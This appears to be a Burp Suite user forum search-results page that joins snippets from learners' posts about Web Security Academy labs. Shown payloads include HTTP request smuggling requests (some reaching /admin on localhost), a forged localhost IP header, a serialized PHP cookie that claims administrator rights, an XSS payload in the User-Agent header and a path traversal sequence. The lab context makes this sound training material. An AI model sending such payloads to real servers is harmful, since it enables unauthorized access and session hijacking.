Burp Suite User Forum
For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.
Found 50 posts in 43 threads
Error: Symfony Version: 4.3.6
PHP Fatal error: Uncaught Exception: Signature does not match session in … /var/www/index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7
Thanks
Hello,
I'm testing a website that uses Japanese characters in URL path and I've noticed that in some … cases the discovered paths are incorrectly logged in the target sitemap in Burp. … rel="stylesheet" href="あ/style.css" />':
# mkdir www
# echo '<! … meta charset="utf-8"><link rel="stylesheet" href="あ/style.css" /></head><body>test</body></html>' > www … amd64
os.name Linux
os.version 6.8.0-41
Hey, not sure if this a bug or a feature)
So if in cookie you change username to not much token, … p9a5ei0x99qi74vejsq36czp0tn1z3d6, xlbjcoe8ecul6sfmtdrt5cm8qqr6o7hx]) Invalid access token for user carlos in … /var/www/index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7
i did the lab as mentioned in the solution but when i submit the request in repeater it says "bad request … i sent:
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
I don't understand how the content-length of the smuggler request is calculated in the lab that works … as te.cl in request smuggling Can you help me 15 where does it come from? … portwigger:
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded … zB2ywbNIdngCwKnb9VDN1oh9cfEUBoU5 csrf=rX10ZHqdOj6WbiBu0FPeeuijWtRBjA3t
Now my Own session cookie is in … HTTP/1.1
Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 272
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
like you are changing the address from 127.0.0.1 to the IP returned as a result of the request sent in … not need to change the IP address, you just need to add the header that is returned from the request in … step 3 and give it the value 127.0.0.1 i.e. in the lab attempt I have just carried out, the header returned … HTTP/1.1
Host: ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … username=carlos HTTP/1.1
X-ayZFvQ-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length
Having similar issues in other labs of this category. … HTTP/1.1
Host: ac451f7f1e1dd31780a427f50095008e.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
responses" is given as
"POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … server was given as
"GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … But if the front-end uses TE, shouldn't the part that needs to be sent to the back-end in the first request … should be like this:
"GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
kept receiving this error:
PHP Fatal error: Uncaught Exception: Signature does not match session in … /var/www/index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7
My secret key
HTTP/1.1
Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded … Content-Length: 15
x=1
0
This can be observed in Logger++:
POST / HTTP/1.1
Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net … Content-Type: application/x-www-form-urlencoded
Content-Length: 105
Transfer-Encoding: chunked … 5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
Pasted in this in the cookies by pressing F12
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjEzOiJhZG1pbmlzdHJhdG9yIjtzOjEyOiJhY2Nlc3NfdG9rZW4iO2k6MDt9 … Internal Server Error
PHP Fatal error: Uncaught Exception: Invalid access token for user administrator in … Command line code:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7"
What is it that … Thank you in advance! c:
gives the error
"PHP Fatal error: Uncaught Exception: Invalid access token for user administrator in … Command line code:7
Stack trace:
#0 {main}
thrown in /var/www/index.php on line 7"
The /admin
Internal Server Error
PHP Fatal error: Uncaught Exception: Invalid access token for user administrator in … Command line code:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7
Can anyone help
Internal Server Error
PHP Fatal error: Uncaught Exception: Invalid access token for user administrator in … Command line code:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7
Can anyone help
36%4d%44%74%39
Internal Server Error
PHP Fatal error: Uncaught Exception: unserialize() failed in … /var/www/index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4
??
I decoded the cookie in this sequence: 2x URL + 1x base64, and then I modified the session cookie then … gave me this error:
Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in … /var/www/index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4
Then, what I … did is: I added the URL in my browser (Firefox) with \admin and then enter the modified session cookie
"Lab: Modifying serialized objects"
PHP Fatal error: Uncaught Exception: unserialize() failed in … /var/www/index.php:4
Stack trace:
#0 {main}
thrown in /var/www/index.php on line 4
echo "O:4
below error
Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in … /var/www/index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4
218.png) is present 3 directory or 4 directory under root directory eg image(218.png) can we present in … directory /var/www/image/218.png or /var/www/image/abc/218.png, How we get to know this for applying
to a burp request ..Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in … /var/www/index.php:5 Stack trace: #0 {main} thrown in /var/www/index.php on line 5
I recognized that the URL in Target, Site map is different from the URL in the Request, Raw window. … Here is what is shown in the Site map window right above (list of all URLs):
https://www. … timename=SCALE_USER&time=FF:13:15:06:15:08:10:37&id=WEB87431-20150615083
And here is what I see in … id=WEB87431-20150616190 HTTP/1.1
Same with:
https://www._something_ com/ - GET - /bp_chart.php?
indicating a degree of custom sorting already), it would really make sense to sort all of the servers in … www.host1.com
www.net2.com
www1.host1.com
while it would really make more sense to *sort* them in … com.host1.www
com.host1.www1
com.net2.www
even though the hostnames are actually displayed as expected
HTTP/1.1
Host: 0abd00da04a3b710c0c4a56b002200b3.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 256
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded … Montoya&email=carlos%40normal-user.net&website=&comment=test
I also tried putting two more blank lines in
Why it shows me bad requests in repeater response when i sent this request
POST / HTTP/1.1
Host: my … lab id
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked … Transfer-encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length
Technical_notes/Add_a_second_IP_address_to_an_existing_network_adapter_on_Windows and "Linux":https://www … .2daygeek.com/how-to-add-additional-ip-secondary-ip-in-ubuntu-debian-system/
Dear Support,
I think there is a problem with the lab Modifying serialized objects, if i try to log in … /var/www/index.php on line 1 PHP Fatal error: require_once(): Failed opening required 'User.php' (include_path … :/usr/share/php') in /var/www/index.php on line 1
And I am unable to log in, therefore no request … /var/www/index.php on line 1
PHP Fatal error: require_once(): Failed opening required 'User.php … :/usr/share/php') in /var/www/index.php on line 1</p>
</div>
</section
Please see below:
POST / HTTP/1.1
Host: <lab-ID>.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded … The second time you submit this request in Repeater, you should see a 403 Forbidden response along with
In one of the "Revealing front-end request rewriting" examples, the Content-Length is wrong. … Transfer-Encoding: chunked
0
POST /login HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … In the above example, the first "Content-Length" is 130 while it should be 135. … supposed to be:
0
POST /login HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
acc91f4d1faf6485c0b70322000b009b.web-security-academy.net
Cookie: session=bWpx0z3BW0qJhvBVGo9kof3BBkwpv3qU
Content-Type: application/x-www-form-urlencoded … Transfer-encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Length: 600
Content-Type: application/x-www-form-urlencoded … postId=9 Accept-Encoding: gzip, deflate Accept-Language: en-GB,e
As you see here, the session cookie in
Im getting a 400 and
{"error":"Invalid request"}
I tried also to switch browser because in the … I'll past the request:
POST / HTTP/1.1
Host: victimhost
Content-Type: application/x-www-form-urlencoded … postId=1 HTTP/1.1
Host: exploitserver
Content-Type: application/x-www-form-urlencoded
Content-Length
Good morning,
The following request in the provided solution did work for me but I don't understand … HTTP/1.1
Host: aca11fb21f25e1e3803a19b400f90012.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
60
POST /admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded … POST /admin HTTP/1.1 -> 20 characters + 2 ending \r\n (22 characters)
Content-Type: application/x-www-form-urlencoded … Thanks in advance for your help.
Regards,
Luc
The funny thing is that I can trigger the alert function when refreshing the page in my own browser. … Exploit:
```
POST / HTTP/1.1
Host: my-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … postId=5 HTTP/1.1
User-Agent: a"/><script>alert(1)</script>
Content-Type: application/x-www-form-urlencoded
In this tutorial there is a Note that says:
The "attack" request and the "normal" request should be … vulnerabilities:
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
As an illustration, in the laboratory entitled "Exploiting HTTP request smuggling to capture other users … HTTP/2
Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … HTTP/2
Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
For instance, in the lab "https://portswigger.net/web-security/request-smuggling/lab-obfuscating-te-header … HTTP/1.1
Host: 0ac800a704bbd7328148caab006b0005.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Transfer-encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
POST / HTTP/1.1
Host: my host.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Transfer-encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Can you help me understand one interesting moment in this lab? … In this lab, smuggling request will be succesful. … document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded … postId=9 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=11
0
/my_profile;jsessionid=560423289919l0e2g6f88f71qjg4xp1z2uwc408389.5604232899 HTTP/1.1
Host: www..... … Connection: close
Content-Length: 3002
X-Single-Page-Navigation: true
Origin: https://www..... … ------WebKitFormBoundarydvPyYQOeLGo0JIKb--
Scanner request (as observed in Flow):
------WebKitFormBoundarydvPyYQOeLGo0JIKb
Of course it is possible, I am located in F China and have to using obfusted traffic to connect to proxy … your PC, then you don't need to f about disgusting thing like port forwarding and windows or firewall, in
getting below Logs repeatedly when running scan and scan runs infinetly
textPayload: "2022-09-15 09:41 … @6b0facef{/,null,UNAVAILABLE} contextPath ends with /* [r STARTING]"
textPayload: "2022-09-15 09:41 … o.e.j.server.handler.ContextHandler - Empty contextPath [r STARTING]"
textPayload: "2022-09-15 09:41 … registered in SERVER runtime does not implement any provider interfaces applicable in the SERVER runtime … [r STARTING]
textPayload: "2022-09-15 09:41:40 INFO b.b.b.BurpSuiteProInstanceLauncher - Starting
me like this -
Internal Server Error
PHP Fatal error: Uncaught Exception: unserialize() failed in … /var/www/index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4.
I'm trying to compare the two requests (mine and the one reported in the lab solution). … What I do not understand is the syntax of the request reported in the lab solution :
POST / HTTP/ … 1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length
As such, it is recommended to set the header as X-XSS-Protection: 0"
Reference https://owasp.org/www-project-secure-headers … /#x-xss-protection
This issue should be fixed in the app.
HTTP/1.1
Host: ac4f1f861e1580afc0ad62b3000a0048.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Content-Length: 251
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded … postId=4&name=aa&email=a%40a.com&website=&comment=Testing
I can see GET requests being reflected in
The URL is http://burp/ - there's no www.
Hi
With the examples you have given, "/41.jpg" and "../41.jpg" details would be stripped so that you … are left with 41.jpg and so the image can be returned. … If you used a sequence such as ....//41.jpg, once ../ has been stripped, you would still be left with … ../41.jpg which would then look in a different folder and fail to find the image.
This is the request I'm trying in repeater (I tried +500 variations at the time of writing but this is … HTTP/1.1
Host: acaf1f911ef7cfe6801f0c0400ef00b5.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Host: exploit-ace11f511e3acff980030cc4010500fe.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … alert(document.cookie) page from the exploit server
- I can see the "victim" trying the POST request in
The application we are using is writting in Java(Spring Boot). … The Content-Type is: application/x-www-form-urlencoded
POST /dz588q90/xhr/api/v2/collector/beacon HTTP/1.1
Host: www.---------.com
Origin: http://example.com … : */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded … Content-Length: 1410
Origin: https://www.--------.com
Connection: close
Referer: https://www.realself.com